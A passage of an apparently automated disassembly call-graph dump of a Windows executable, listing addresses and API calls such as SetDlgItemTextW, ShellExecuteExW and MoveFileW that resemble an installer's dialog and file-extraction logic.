25231->25360 25238 7ff669aba008 58 API calls 25232->25238 25234->25215 25809 7ff669aa12c0 25237->25809 25239 7ff669acb595 SetDlgItemTextW 25238->25239 25244 7ff669aba008 58 API calls 25239->25244 25892 7ff669ad6854 25240->25892 25245 7ff669acb7cf 25243->25245 25246 7ff669acb7e6 25243->25246 25243->25367 25249 7ff669acb5c7 25244->25249 25871 7ff669aa255c GetWindowTextLengthW 25245->25871 25252 7ff669aa8a94 33 API calls 25246->25252 25265 7ff669aa12c0 33 API calls 25249->25265 25251 7ff669acbdff 25260 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25251->25260 25272 7ff669acb7df BuildCatchObjectHelperInternal 25252->25272 25258 7ff669acad05 25819 7ff669ace8fc 25258->25819 25266 7ff669acbe05 25260->25266 25301 7ff669acb5fc 25265->25301 25279 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25266->25279 25280 7ff669acb87f 25272->25280 25286 7ff669aa1fa8 31 API calls 25272->25286 25278 7ff669acb6ab 25284 7ff669aba008 58 API calls 25278->25284 25285 7ff669acbe0b 25279->25285 25295 7ff669aa1fa8 31 API calls 25280->25295 25313 7ff669acb892 25280->25313 25283 7ff669acad5f 25290 7ff669acae7d 25283->25290 25570 7ff669acf2bc 25283->25570 25292 7ff669acb6b5 25284->25292 25305 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25285->25305 25286->25280 25299 7ff669acaeab 25290->25299 25833 7ff669ab266c 25290->25833 25321 7ff669aa12c0 33 API calls 25292->25321 25295->25313 25583 7ff669ab2314 25299->25583 25301->25278 25316 7ff669aa12c0 33 API calls 25301->25316 25312 7ff669acbe11 25305->25312 25324 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25312->25324 25325 7ff669acbe23 25313->25325 25313->25367 25323 7ff669acb64d 25316->25323 25318 7ff669acaec5 GetLastError 25319 7ff669acaedd 25318->25319 25595 7ff669ab7268 25319->25595 25344 7ff669acb6ea 25321->25344 25327 7ff669aba008 58 API calls 25323->25327 25330 7ff669acbe17 25324->25330 25332 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25325->25332 25326 7ff669acae9f 25836 7ff669ac962c 12 API calls _handle_error 25326->25836 25334 7ff669acb658 25327->25334 25345 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25330->25345 25338 7ff669acbe29 25332->25338 25869 7ff669aa1170 33 API calls BuildCatchObjectHelperInternal 25334->25869 25337 7ff669acaeef 25342 7ff669acaf05 25337->25342 25343 7ff669acaef6 GetLastError 25337->25343 25351 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25338->25351 25340 7ff669acb670 25870 7ff669aa2044 33 API calls BuildCatchObjectHelperInternal 25340->25870 25348 7ff669acafbc 25342->25348 25354 7ff669acafcb 25342->25354 25355 7ff669acaf1c GetTickCount 25342->25355 25343->25342 25344->25330 25349 7ff669acb749 25344->25349 25350 7ff669acbe1d 25345->25350 25348->25354 25371 7ff669acb435 25348->25371 25349->25350 25349->25356 25362 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25350->25362 25358 7ff669acbe2f 25351->25358 25363 7ff669acb2f1 25354->25363 25837 7ff669ab5758 25354->25837 25598 7ff669aa4cdc 25355->25598 25356->25231 25364 7ff669aa26c8 63 API calls 25358->25364 25359 7ff669acb68f 25365 7ff669aa1fa8 31 API calls 25359->25365 25883 7ff669ad1d90 25360->25883 25362->25325 25363->25367 25866 7ff669aa2830 33 API calls 25363->25866 25369 7ff669acbea0 25364->25369 25370 7ff669acb69d 25365->25370 25366 7ff669acaf31 25604 7ff669aa1fa8 25366->25604 25367->25219 25375 7ff669acbea4 25369->25375 25376 7ff669acbf46 GetDlgItem SetFocus 25369->25376 25417 7ff669acbeba 25369->25417 25377 7ff669aa1fa8 31 API calls 25370->25377 25629 7ff669aba008 25371->25629 25374 7ff669acafef 25850 7ff669abb25c 99 API calls 25374->25850 25382 7ff669ad1d90 _handle_error 8 API calls 25375->25382 25384 7ff669acbf7a 25376->25384 25377->25278 25378 7ff669acb316 25867 7ff669aa1170 33 API calls BuildCatchObjectHelperInternal 25378->25867 25381 7ff669acb009 GetCurrentProcessId 25851 7ff669abd2bc 25381->25851 25389 7ff669acc553 25382->25389 25395 7ff669aa12c0 33 API calls 25384->25395 25390 7ff669acaf64 25609 7ff669ab1534 25390->25609 25392 7ff669acb32e 25397 7ff669aba008 58 API calls 25392->25397 25393 7ff669acb05e GetCommandLineW 25398 7ff669acb103 25393->25398 25399 7ff669acb0f4 25393->25399 25394 7ff669acbef1 SendDlgItemMessageW 25400 7ff669acbf11 25394->25400 25401 7ff669acbf1a EndDialog 25394->25401 25402 7ff669acbf8c 25395->25402 25396 7ff669aa26a0 25403 7ff669acb481 SetDlgItemTextW GetDlgItem 25396->25403 25404 7ff669acb33b 25397->25404 25858 7ff669aca430 33 API calls _handle_error 25398->25858 25854 7ff669aa20c0 25399->25854 25400->25401 25401->25375 25897 7ff669ab737c 33 API calls 25402->25897 25409 7ff669acb4d2 25403->25409 25410 7ff669acb4ac GetWindowLongPtrW SetWindowLongPtrW 25403->25410 25868 7ff669aa1170 33 API calls BuildCatchObjectHelperInternal 25404->25868 25644 7ff669acc9c4 25409->25644 25410->25409 25412 7ff669acb114 25859 7ff669aca430 33 API calls _handle_error 25412->25859 25414 7ff669acbfa0 25421 7ff669aa2678 SetDlgItemTextW 25414->25421 25415 7ff669acb34e 25422 7ff669aa1fa8 31 API calls 25415->25422 25417->25375 25417->25394 25419 7ff669acaf92 GetLastError 25420 7ff669acafa1 25419->25420 25625 7ff669ab1444 25420->25625 25426 7ff669acbfb4 25421->25426 25427 7ff669acb35c 25422->25427 25424 7ff669acb125 25860 7ff669aca430 33 API calls _handle_error 25424->25860 25437 7ff669acbfeb SendDlgItemMessageW FindFirstFileW 25426->25437 25432 7ff669aa1fa8 31 API calls 25427->25432 25428 7ff669acc9c4 162 API calls 25429 7ff669acb4fb 25428->25429 25756 7ff669acf1d4 25429->25756 25433 7ff669acb36a 25432->25433 25444 7ff669aba008 58 API calls 25433->25444 25435 7ff669acb136 25861 7ff669abb2fc 99 API calls 25435->25861 25440 7ff669acc03f 25437->25440 25534 7ff669acc4c2 25437->25534 25450 7ff669aba008 58 API calls 25440->25450 25441 7ff669acc9c4 162 API calls 25454 7ff669acb529 25441->25454 25442 7ff669acb151 25862 7ff669acf418 33 API calls 25442->25862 25443 7ff669acc53d 25443->25375 25447 7ff669acb382 25444->25447 25446 7ff669acc567 25452 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25446->25452 25456 7ff669aa12c0 33 API calls 25447->25456 25448 7ff669acb555 25771 7ff669aa235c GetDlgItem EnableWindow 25448->25771 25449 7ff669acb17a 25458 7ff669aa4cdc 33 API calls 25449->25458 25451 7ff669acc062 25450->25451 25459 7ff669aa12c0 33 API calls 25451->25459 25455 7ff669acc56c 25452->25455 25454->25448 25457 7ff669acc9c4 162 API calls 25454->25457 25460 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25455->25460 25466 7ff669acb3b7 25456->25466 25457->25448 25461 7ff669acb197 25458->25461 25462 7ff669acc094 25459->25462 25463 7ff669acc572 25460->25463 25469 7ff669aa1fa8 31 API calls 25461->25469 25898 7ff669aa1170 33 API calls BuildCatchObjectHelperInternal 25462->25898 25468 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25463->25468 25465 7ff669acc0af 25899 7ff669aad5bc 33 API calls 2 library calls 25465->25899 25466->25312 25467 7ff669acb416 25466->25467 25471 7ff669aa1fa8 31 API calls 25467->25471 25472 7ff669acc578 25468->25472 25473 7ff669acb1c2 25469->25473 25471->25367 25477 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25472->25477 25863 7ff669aa2c5c 35 API calls _handle_error 25473->25863 25474 7ff669acc0c6 25476 7ff669aa1fa8 31 API calls 25474->25476 25479 7ff669acc0d3 25476->25479 25480 7ff669acc57e 25477->25480 25478 7ff669acb1d7 ShellExecuteExW 25489 7ff669acb1f6 25478->25489 25479->25455 25481 7ff669aa1fa8 31 API calls 25479->25481 25482 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25480->25482 25483 7ff669acc139 25481->25483 25484 7ff669acc584 25482->25484 25485 7ff669aa2678 SetDlgItemTextW 25483->25485 25488 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25484->25488 25487 7ff669acc14d FindClose 25485->25487 25486 7ff669acb254 25490 7ff669aa1fa8 31 API calls 25486->25490 25491 7ff669acc258 SendDlgItemMessageW 25487->25491 25492 7ff669acc169 25487->25492 25493 7ff669acc58a 25488->25493 25489->25486 25864 7ff669aa2f50 15 API calls _handle_error 25489->25864 25494 7ff669acb275 25490->25494 25495 7ff669acc28c 25491->25495 25900 7ff669ac9ae4 10 API calls _handle_error 25492->25900 25865 7ff669aa2c2c DisconnectNamedPipe CloseHandle 25494->25865 25501 7ff669aba008 58 API calls 25495->25501 25499 7ff669acc18c 25502 7ff669aba008 58 API calls 25499->25502 25500 7ff669acb283 25500->25285 25503 7ff669acb2bd 25500->25503 25504 7ff669acc299 25501->25504 25505 7ff669acc195 25502->25505 25506 7ff669aa1fa8 31 API calls 25503->25506 25509 7ff669aa12c0 33 API calls 25504->25509 25507 7ff669abd2bc 48 API calls 25505->25507 25508 7ff669acb2e3 25506->25508 25515 7ff669acc1b2 BuildCatchObjectHelperInternal 25507->25515 25510 7ff669aa1fa8 31 API calls 25508->25510 25512 7ff669acc2cb 25509->25512 25510->25363 25511 7ff669aa1fa8 31 API calls 25513 7ff669acc244 25511->25513 25901 7ff669aa1170 33 API calls BuildCatchObjectHelperInternal 25512->25901 25516 7ff669aa2678 SetDlgItemTextW 25513->25516 25515->25463 25515->25511 25516->25491 25517 7ff669acc2e6 25902 7ff669aad5bc 33 API calls 2 library calls 25517->25902 25519 7ff669acc2fd 25520 7ff669aa1fa8 31 API calls 25519->25520 25521 7ff669acc309 BuildCatchObjectHelperInternal 25520->25521 25522 7ff669aa1fa8 31 API calls 25521->25522 25523 7ff669acc343 25522->25523 25524 7ff669aa1fa8 31 API calls 25523->25524 25525 7ff669acc350 25524->25525 25525->25472 25526 7ff669aa1fa8 31 API calls 25525->25526 25527 7ff669acc3b6 25526->25527 25528 7ff669aa2678 SetDlgItemTextW 25527->25528 25529 7ff669acc3ca 25528->25529 25529->25534 25903 7ff669ac9ae4 10 API calls _handle_error 25529->25903 25531 7ff669acc3f5 25532 7ff669aba008 58 API calls 25531->25532 25533 7ff669acc3ff 25532->25533 25535 7ff669abd2bc 48 API calls 25533->25535 25534->25375 25534->25443 25534->25446 25534->25484 25537 7ff669acc41c BuildCatchObjectHelperInternal 25535->25537 25536 7ff669aa1fa8 31 API calls 25538 7ff669acc4ae 25536->25538 25537->25480 25537->25536 25539 7ff669aa2678 SetDlgItemTextW 25538->25539 25539->25534 25541 7ff669aa26e2 25540->25541 25542 7ff669aa274d 25540->25542 25541->25542 25543 7ff669aa270c 25541->25543 25904 7ff669ab96b4 25541->25904 25542->25185 25543->25542 25545 7ff669aa2721 GetDlgItem 25543->25545 25545->25542 25546 7ff669aa2734 25545->25546 25546->25542 25547 7ff669aa273b SetWindowTextW 25546->25547 25547->25542 25549 7ff669aa2497 25548->25549 25550 7ff669aa245c 25548->25550 25551 7ff669aa255c 35 API calls 25549->25551 25552 7ff669aa12c0 33 API calls 25550->25552 25553 7ff669aa248d BuildCatchObjectHelperInternal 25551->25553 25552->25553 25554 7ff669aa1fa8 31 API calls 25553->25554 25557 7ff669aa24ef 25553->25557 25554->25557 25555 7ff669aa252e 25556 7ff669ad1d90 _handle_error 8 API calls 25555->25556 25558 7ff669aa2543 25556->25558 25557->25555 25559 7ff669aa2556 25557->25559 25558->25211 25558->25212 25558->25367 25560 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25559->25560 25561 7ff669aa255b 25560->25561 25563 7ff669aa8ac4 25562->25563 25567 7ff669aa8b6f 25562->25567 25568 7ff669aa8aca 25563->25568 26018 7ff669ad1c40 25563->26018 26028 7ff669aa200c 33 API calls std::_Xinvalid_argument 25567->26028 26027 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25568->26027 25571 7ff669acf2f3 25570->25571 25572 7ff669acf3ec 25570->25572 25571->25572 26040 7ff669acc924 25571->26040 25573 7ff669ad1d90 _handle_error 8 API calls 25572->25573 25575 7ff669acf3fd 25573->25575 25575->25290 25577 7ff669acf3b5 25577->25572 25580 7ff669acf412 25577->25580 25578 7ff669acf369 RegSetValueExW RegCloseKey 25578->25577 25581 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25580->25581 25582 7ff669acf417 25581->25582 25584 7ff669ab234a 25583->25584 25590 7ff669ab245b 25583->25590 25587 7ff669ab2435 25584->25587 25589 7ff669aa12c0 33 API calls 25584->25589 25592 7ff669ab2486 25584->25592 26048 7ff669ab2a30 25584->26048 25585 7ff669ad1d90 _handle_error 8 API calls 25586 7ff669ab2471 25585->25586 25586->25318 25586->25319 25588 7ff669ab2a30 56 API calls 25587->25588 25587->25590 25588->25590 25589->25584 25590->25585 25593 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25592->25593 25594 7ff669ab248b 25593->25594 25596 7ff669ab7273 25595->25596 25597 7ff669ab7276 SetCurrentDirectoryW 25595->25597 25596->25597 25597->25337 25599 7ff669aa4d09 25598->25599 25600 7ff669aa4d21 25599->25600 25601 7ff669aa12c0 33 API calls 25599->25601 25602 7ff669ad1d90 _handle_error 8 API calls 25600->25602 25601->25600 25603 7ff669aa4d58 25602->25603 25603->25366 25605 7ff669aa1fbb 25604->25605 25606 7ff669aa1fe4 25604->25606 25605->25606 25607 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25605->25607 25606->25390 25608 7ff669aa2008 25607->25608 25611 7ff669ab156a 25609->25611 25610 7ff669ab15b1 CreateFileW 25612 7ff669ab159e 25610->25612 25611->25610 25611->25612 25613 7ff669ab1682 25612->25613 25615 7ff669ab5d18 49 API calls 25612->25615 25614 7ff669aa3cac 33 API calls 25613->25614 25617 7ff669ab169f 25614->25617 25616 7ff669ab160c 25615->25616 25618 7ff669ab1610 CreateFileW 25616->25618 25619 7ff669ab1649 25616->25619 25620 7ff669ad1d90 _handle_error 8 API calls 25617->25620 25618->25619 25619->25613 25622 7ff669ab16c8 25619->25622 25621 7ff669ab16b4 25620->25621 25621->25419 25621->25420 25623 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25622->25623 25624 7ff669ab16cd 25623->25624 25626 7ff669ab145e 25625->25626 25627 7ff669ab146a 25625->25627 25626->25627 26196 7ff669ab14d0 25626->26196 25641 7ff669aba029 _snwprintf 25629->25641 25631 7ff669aba078 25632 7ff669aba244 48 API calls 25631->25632 25642 7ff669aba0b1 25632->25642 25633 7ff669ad1c40 4 API calls 25633->25641 25635 7ff669ad1d90 _handle_error 8 API calls 25637 7ff669aba1c3 SetDlgItemTextW 25635->25637 25637->25396 25639 7ff669aa12c0 33 API calls 25639->25641 25641->25631 25641->25633 25641->25639 25641->25642 25643 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25641->25643 26203 7ff669aba244 25641->26203 26209 7ff669ab9e70 33 API calls 25641->26209 26210 7ff669ad251c AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 25641->26210 26211 7ff669ad245c 34 API calls 25641->26211 26212 7ff669ad24b0 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 25641->26212 25642->25635 25643->25641 25744 7ff669acca3c BuildCatchObjectHelperInternal 25644->25744 25646 7ff669accd78 25647 7ff669aa1fa8 31 API calls 25646->25647 25649 7ff669accd81 25647->25649 25648 7ff669abcaf0 33 API calls 25648->25744 25650 7ff669ad1d90 _handle_error 8 API calls 25649->25650 25651 7ff669acb4ea 25650->25651 25651->25428 25652 7ff669ace783 26390 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 25652->26390 25655 7ff669ace789 25656 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25655->25656 25657 7ff669ace78f 25656->25657 26391 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 25657->26391 25658 7ff669ace777 25659 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25658->25659 25660 7ff669ace77d 25659->25660 26389 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 25660->26389 25663 7ff669ace795 25666 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25663->25666 25665 7ff669ace6fd 25668 7ff669aa3cac 33 API calls 25665->25668 25669 7ff669ace79b 25666->25669 25674 7ff669ace70d 25668->25674 25676 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25669->25676 25670 7ff669ace771 26388 7ff669aa200c 33 API calls std::_Xinvalid_argument 25670->26388 25673 7ff669ab55f8 35 API calls 25673->25744 26386 7ff669aca4ac 33 API calls 2 library calls 25674->26386 25679 7ff669ace7a1 25676->25679 25678 7ff669ace723 25684 7ff669aa1fa8 31 API calls 25678->25684 25687 7ff669ace73a BuildCatchObjectHelperInternal 25678->25687 25685 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25679->25685 25681 7ff669aa268c SetWindowTextW 25681->25744 25682 7ff669adaacc 43 API calls 25682->25744 25683 7ff669aca4ac 33 API calls 25683->25744 25684->25687 25688 7ff669ace7a7 25685->25688 26387 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25687->26387 25690 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25688->25690 25693 7ff669ace7ad 25690->25693 25691 7ff669ace7c5 26394 7ff669aa200c 33 API calls std::_Xinvalid_argument 25691->26394 25692 7ff669ab32ac 54 API calls 25692->25744 25700 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25693->25700 25695 7ff669aa20c0 33 API calls 25695->25744 25696 7ff669ace7d1 26396 7ff669aa200c 33 API calls std::_Xinvalid_argument 25696->26396 25697 7ff669ace7cb 26395 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25697->26395 25699 7ff669aa3cac 33 API calls 25699->25744 25706 7ff669ace7b3 25700->25706 25701 7ff669ab4ba8 33 API calls 25701->25744 25702 7ff669ace7bf 26393 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25702->26393 25703 7ff669ace7b9 26392 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 25703->26392 25718 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25706->25718 25708 7ff669aad5bc 33 API calls 25708->25744 25710 7ff669ab3108 51 API calls 25710->25744 25713 7ff669acfedc 31 API calls 25713->25744 25716 7ff669ad1c40 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 25716->25744 25717 7ff669acd123 GetDlgItem 25720 7ff669aa268c SetWindowTextW 25717->25720 25718->25703 25723 7ff669acd142 SendMessageW 25720->25723 25722 7ff669ab4ee4 53 API calls 25722->25744 25723->25744 25724 7ff669ab2680 51 API calls 25724->25744 25725 7ff669ab4e2c 33 API calls 25725->25744 25727 7ff669acd176 SendMessageW 25727->25744 25731 7ff669aa4cdc 33 API calls 25731->25744 25732 7ff669aa1754 33 API calls 25732->25744 25733 7ff669ac0ad8 CompareStringW 25733->25744 25734 7ff669ab266c 51 API calls 25734->25744 25736 7ff669aa2678 SetDlgItemTextW 25736->25744 25740 7ff669aa2044 33 API calls 25740->25744 25741 7ff669ac925c 31 API calls 25741->25744 25744->25646 25744->25648 25744->25652 25744->25655 25744->25657 25744->25658 25744->25660 25744->25663 25744->25665 25744->25669 25744->25670 25744->25673 25744->25679 25744->25681 25744->25682 25744->25683 25744->25687 25744->25688 25744->25691 25744->25692 25744->25693 25744->25695 25744->25696 25744->25697 25744->25699 25744->25701 25744->25702 25744->25703 25744->25706 25744->25708 25744->25710 25744->25713 25744->25716 25744->25722 25744->25724 25744->25725 25744->25727 25744->25731 25744->25732 25744->25733 25744->25734 25744->25736 25744->25740 25744->25741 25745 7ff669acda75 EndDialog 25744->25745 25746 7ff669acd61b MoveFileW 25744->25746 25747 7ff669aa12c0 33 API calls 25744->25747 25750 7ff669ab2314 56 API calls 25744->25750 25752 7ff669aa8a94 33 API calls 25744->25752 25754 7ff669abd440 33 API calls 25744->25754 25755 7ff669aa1fa8 31 API calls 25744->25755 26232 7ff669aca2e4 25744->26232 26236 7ff669ac9d24 25744->26236 26277 7ff669aced48 25744->26277 26316 7ff669abc888 35 API calls _invalid_parameter_noinfo_noreturn 25744->26316 26317 7ff669ac8e34 33 API calls Concurrency::cancel_current_task 25744->26317 26318 7ff669acff20 31 API calls _invalid_parameter_noinfo_noreturn 25744->26318 26319 7ff669aad3ac 47 API calls BuildCatchObjectHelperInternal 25744->26319 26320 7ff669aca134 25744->26320 26338 7ff669ac8d98 33 API calls 25744->26338 26339 7ff669ab666c 33 API calls 2 library calls 25744->26339 26340 7ff669ab3404 33 API calls 25744->26340 26341 7ff669ab58b4 33 API calls 3 library calls 25744->26341 26342 7ff669ab65d0 25744->26342 26346 7ff669ab257c 25744->26346 26360 7ff669aa1170 33 API calls BuildCatchObjectHelperInternal 25744->26360 26361 7ff669ab321c FindClose 25744->26361 26362 7ff669aa13c4 25744->26362 26372 7ff669ac0b08 CompareStringW 25744->26372 26373 7ff669ac956c 47 API calls 25744->26373 26374 7ff669ac807c 51 API calls 3 library calls 25744->26374 26375 7ff669aca430 33 API calls _handle_error 25744->26375 26376 7ff669ab70b0 25744->26376 26384 7ff669ab4e8c CompareStringW 25744->26384 26385 7ff669ab7170 47 API calls 25744->26385 25745->25744 25748 7ff669acd67c 25746->25748 25749 7ff669acd658 MoveFileExW 25746->25749 25747->25744 25751 7ff669aa1fa8 31 API calls 25748->25751 25749->25748 25750->25744 25751->25744 25752->25744 25754->25744 25755->25744 25757 7ff669aa20c0 33 API calls 25756->25757 25758 7ff669acf20a 25757->25758 26410 7ff669abd318 25758->26410 25760 7ff669acf21d 25761 7ff669aa3cac 33 API calls 25760->25761 25762 7ff669acf22c 25761->25762 26414 7ff669aa8f84 25762->26414 25764 7ff669acf23b 26418 7ff669aad7a4 25764->26418 25766 7ff669acf289 26438 7ff669aadc48 25766->26438 25768 7ff669acf294 25769 7ff669ad1d90 _handle_error 8 API calls 25768->25769 25770 7ff669acb511 25769->25770 25770->25441 25772 7ff669b0e2f0 25771->25772 27446 7ff669ac7d40 25773->27446 25776 7ff669aced1f 25778 7ff669ad1d90 _handle_error 8 API calls 25776->25778 25777 7ff669acec2f GetWindow 25782 7ff669acec4a 25777->25782 25779 7ff669acb905 25778->25779 25779->25197 25779->25198 25780 7ff669acec56 GetClassNameW 27451 7ff669ac0ad8 CompareStringW 25780->27451 25782->25776 25782->25780 25783 7ff669acecfe GetWindow 25782->25783 25784 7ff669acec7f GetWindowLongPtrW 25782->25784 25783->25776 25783->25782 25784->25783 25785 7ff669acec91 SendMessageW 25784->25785 25785->25783 25786 7ff669acecad GetObjectW 25785->25786 27452 7ff669ac7da8 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25786->27452 25788 7ff669acecc9 27453 7ff669ac7d70 25788->27453 27457 7ff669ac86b0 16 API calls _handle_error 25788->27457 25791 7ff669acece1 SendMessageW DeleteObject 25791->25783 25793 7ff669ab5617 25792->25793 25797 7ff669ab5696 25792->25797 25794 7ff669aa13c4 33 API calls 25793->25794 25795 7ff669ab5632 GetCurrentDirectoryW 25794->25795 25796 7ff669aa20c0 33 API calls 25795->25796 25798 7ff669ab5658 25796->25798 25797->25208 25798->25797 25799 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25798->25799 25800 7ff669ab56ad 25799->25800 25802 7ff669aa2693 25801->25802 25803 7ff669aa2696 SetWindowTextW 25801->25803 25802->25803 25804 7ff669b0e2e8 25803->25804 25805->25220 25807 7ff669aa267f 25806->25807 25808 7ff669aa2682 SetDlgItemTextW 25806->25808 25807->25808 25810 7ff669aa12f4 25809->25810 25817 7ff669aa13ba 25809->25817 25813 7ff669aa132a 25810->25813 25814 7ff669aa13b5 25810->25814 25818 7ff669aa12fa BuildCatchObjectHelperInternal 25810->25818 25816 7ff669ad1c40 4 API calls 25813->25816 25813->25818 27462 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 25814->27462 25816->25818 27463 7ff669aa200c 33 API calls std::_Xinvalid_argument 25817->27463 25818->25258 27464 7ff669aca644 PeekMessageW 25819->27464 25822 7ff669ace99b SendMessageW SendMessageW 25824 7ff669ace9e1 25822->25824 25825 7ff669ace9fc SendMessageW 25822->25825 25823 7ff669ace94d 25826 7ff669ace959 ShowWindow SendMessageW SendMessageW 25823->25826 25824->25825 25827 7ff669acea1e SendMessageW SendMessageW 25825->25827 25828 7ff669acea1b 25825->25828 25826->25822 25829 7ff669acea70 SendMessageW 25827->25829 25830 7ff669acea4b SendMessageW 25827->25830 25828->25827 25831 7ff669ad1d90 _handle_error 8 API calls 25829->25831 25830->25829 25832 7ff669acad15 25831->25832 25832->25251 25832->25283 25834 7ff669ab2680 51 API calls 25833->25834 25835 7ff669ab2675 25834->25835 25835->25299 25835->25326 25836->25299 25838 7ff669aa13c4 33 API calls 25837->25838 25839 7ff669ab578d 25838->25839 25840 7ff669ab5790 GetModuleFileNameW 25839->25840 25844 7ff669ab57e0 25839->25844 25841 7ff669ab57e2 25840->25841 25842 7ff669ab57ab 25840->25842 25841->25844 25843 7ff669aa2164 33 API calls 25842->25843 25843->25839 25845 7ff669aa12c0 33 API calls 25844->25845 25847 7ff669ab580c 25845->25847 25846 7ff669ab5844 25846->25374 25847->25846 25848 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25847->25848 25849 7ff669ab5866 25848->25849 25850->25381 27469 7ff669abd098 25851->27469 25855 7ff669aa20e2 25854->25855 25856 7ff669aa20e8 BuildCatchObjectHelperInternal 25855->25856 27503 7ff669aa1490 33 API calls 3 library calls 25855->27503 25856->25398 25858->25412 25859->25424 25860->25435 25861->25442 25862->25449 25863->25478 25864->25486 25865->25500 25866->25378 25867->25392 25868->25415 25869->25340 25870->25359 25872 7ff669aa13c4 33 API calls 25871->25872 25873 7ff669aa25c9 GetWindowTextW 25872->25873 25874 7ff669aa25fe 25873->25874 25875 7ff669aa12c0 33 API calls 25874->25875 25876 7ff669aa260c 25875->25876 25877 7ff669aa2647 25876->25877 25879 7ff669aa266f 25876->25879 25878 7ff669ad1d90 _handle_error 8 API calls 25877->25878 25880 7ff669aa265d 25878->25880 25881 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25879->25881 25880->25272 25882 7ff669aa2674 25881->25882 25884 7ff669ad1d99 25883->25884 25885 7ff669ad1fc0 IsProcessorFeaturePresent 25884->25885 25886 7ff669acbde7 25884->25886 25887 7ff669ad1fd8 25885->25887 27504 7ff669ad21b8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25887->27504 25889 7ff669ad1feb 27505 7ff669ad1f80 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25889->27505 27506 7ff669ad678c 31 API calls 3 library calls 25892->27506 25894 7ff669ad686d 27507 7ff669ad6884 16 API calls abort 25894->27507 25897->25414 25898->25465 25899->25474 25900->25499 25901->25517 25902->25519 25903->25531 25931 7ff669ab9d6c 25904->25931 25910 7ff669ab9723 25913 7ff669ab9799 25910->25913 25925 7ff669ab9777 SetDlgItemTextW 25910->25925 25952 7ff669ab8a34 25910->25952 25911 7ff669ab9811 25914 7ff669ab9910 GetSystemMetrics GetWindow 25911->25914 25915 7ff669ab9819 GetWindowLongPtrW 25911->25915 25912 7ff669ab98d3 25912->25914 25956 7ff669ab87e0 25912->25956 25937 7ff669ab8638 25913->25937 25918 7ff669ab9aa6 25914->25918 25928 7ff669ab993d 25914->25928 25916 7ff669b0e2c0 25915->25916 25919 7ff669ab98bb GetWindowRect 25916->25919 25922 7ff669ad1d90 _handle_error 8 API calls 25918->25922 25919->25912 25924 7ff669ab9ab5 25922->25924 25923 7ff669ab9900 SetWindowTextW 25923->25914 25924->25543 25925->25910 25926 7ff669ab9959 GetWindowRect 25965 7ff669aa22c8 25926->25965 25928->25918 25928->25926 25929 7ff669ab9a83 GetWindow 25928->25929 25930 7ff669ab9a29 SendMessageW 25928->25930 25929->25918 25929->25928 25930->25928 25932 7ff669ab9d91 swprintf 25931->25932 25972 7ff669ad9494 25932->25972 25935 7ff669ac055c WideCharToMultiByte 25936 7ff669ac059d 25935->25936 25936->25910 25938 7ff669ab87e0 47 API calls 25937->25938 25942 7ff669ab867f 25938->25942 25939 7ff669ab8790 25940 7ff669ad1d90 _handle_error 8 API calls 25939->25940 25941 7ff669ab87c4 GetWindowRect GetClientRect 25940->25941 25941->25911 25941->25912 25942->25939 25943 7ff669aa12c0 33 API calls 25942->25943 25944 7ff669ab86cf 25943->25944 25945 7ff669aa12c0 33 API calls 25944->25945 25951 7ff669ab87d7 25944->25951 25948 7ff669ab874a 25945->25948 25946 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25947 7ff669ab87dd 25946->25947 25948->25939 25949 7ff669ab87d2 25948->25949 25950 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 25949->25950 25950->25951 25951->25946 25953 7ff669ab8a74 25952->25953 25955 7ff669ab8a9d 25952->25955 26011 